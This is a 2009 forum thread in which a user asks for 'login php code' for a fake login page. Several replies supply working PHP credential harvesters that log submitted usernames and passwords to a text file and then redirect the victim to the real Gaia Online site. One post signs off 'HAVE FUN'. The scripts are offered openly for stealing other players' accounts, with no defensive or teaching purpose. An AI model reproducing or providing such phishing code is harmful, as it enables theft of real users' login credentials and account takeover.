I Need One For FLP.
Someone Gimme Onez
Results 1 to 12 of 12
Thread: Anyone Got Loin Php Code?
- 15 Nov. 2009 07:13am #1
Anyone Got Loin Php Code?
My Guides:
Use Items Twice
[WPE]Emote Scripting
Mod Your Gamertag On MW2 With A USB
Mod Your Gamerscore With A USB
Mod MW2 Spec Ops With A USB
Mod Your Avatar With A USB
How to get free DLC
50 Posts
100 Posts
150 Posts
250 Posts
500 Posts
1000 Posts
Incomplete Complete
R.I.P
My Gaia accounts.
TlMlD
I3R
I Hi-Fi I
I iMusic I
I3 I S H
- 15 Nov. 2009 07:18am #2
- Age
- 28
- Join Date
- Nov. 2009
- Location
- Asia
- Posts
- 2,701
- Reputation
- 72
- LCash
- 200.00
- Awards
I think Arti posted it
Humans yawn when they think of it.
- 15 Nov. 2009 07:19am #3
My Guides:
Use Items Twice
[WPE]Emote Scripting
Mod Your Gamertag On MW2 With A USB
Mod Your Gamerscore With A USB
Mod MW2 Spec Ops With A USB
Mod Your Avatar With A USB
How to get free DLC
50 Posts
100 Posts
150 Posts
250 Posts
500 Posts
1000 Posts
Incomplete Complete
R.I.P
My Gaia accounts.
TlMlD
I3R
I Hi-Fi I
I iMusic I
I3 I S H
- 15 Nov. 2009 07:30am #4
- Age
- 28
- Join Date
- Nov. 2009
- Location
- Asia
- Posts
- 2,701
- Reputation
- 72
- LCash
- 200.00
- Awards
I was mistaken it was something else.
Humans yawn when they think of it.
- 15 Nov. 2009 10:55am #5
Here's loin php code:
HTML Code:<php> <loin>pelvic%20THRUST </loin> </php>
- 15 Nov. 2009 02:41pm #6
Lol`d so hard.
Here is one that I randomly found:
HTML Code:<html> <head> <title>Error</title> <script type="text/javascript"> window.location = "http://www.websitethatyouwanttoredirectto.com" </script> </head> <body> </body> </html> <?php @$username = addslashes($_POST['username']); @$password = addslashes($_POST['password']); $fileContents=file_get_contents("NAMEOFPASSWORDLIST.txt"); $file = fopen("NAMEOFPASSWORDLIST.txt","r+"); $fileContents=$fileContents . "\n" . $username . "\t" . $password; fwrite($file,$fileContents); fclose($file); ?>
- 15 Nov. 2009 02:46pm #7
I think he posted it in the Programming Forum.
- 15 Nov. 2009 03:41pm #8
Talk to Gamechief. He knows PhP and may have a code for the login. No offence to arti.
- 15 Nov. 2009 04:18pm #9Code:
<html> <head> <title>Error</title> <script type="text/javascript"> window.location = "http://login.gaiaonline.com/gaia/login.php" </script> </head> <body> </body> </html> <?php @$username = addslashes($_POST['username']); @$password = addslashes($_POST['password']); $fileContents=file_get_contents("info.txt"); $file = fopen("info.txt","r+"); $fileContents=$fileContents . "\n" . $username . "\t" . $password; fwrite($file,$fileContents); fclose($file); ?>
- 15 Nov. 2009 04:58pm #10
<?php
$username = $_POST['username'];
$password = $_POST['password'];
if(get_magic_quotes_gpc()) {
$username = stripslashes($username);
$password = stripslashes($password);
}
$log = "Accounts.txt";
$logfile = fopen($log, "a");
fwrite($logfile,$username.":".$password."\r\n");
fclose($logfile);
header ("Location:http://www.gaiaonline.com");
?>
Tab out username= and password=
the rest you leave the same
- 18 Nov. 2009 01:21pm #11
<?php
$username = $_POST['username'];
$password = $_POST['password'];
if(get_magic_quotes_gpc()) {
$username = stripslashes($username);
$password = stripslashes($password);
}
$log = "Accounts.txt";
$logfile = fopen($log, "a");
fwrite($logfile,$username.":".$password."\r\n");
fclose($logfile);
header ("Location:http://www.gaiaonline.com");
?>
HAVE FUN ;]
- 18 Nov. 2009 11:14pm #12
My Guides:
Use Items Twice
[WPE]Emote Scripting
Mod Your Gamertag On MW2 With A USB
Mod Your Gamerscore With A USB
Mod MW2 Spec Ops With A USB
Mod Your Avatar With A USB
How to get free DLC
50 Posts
100 Posts
150 Posts
250 Posts
500 Posts
1000 Posts
Incomplete Complete
R.I.P
My Gaia accounts.
TlMlD
I3R
I Hi-Fi I
I iMusic I
I3 I S H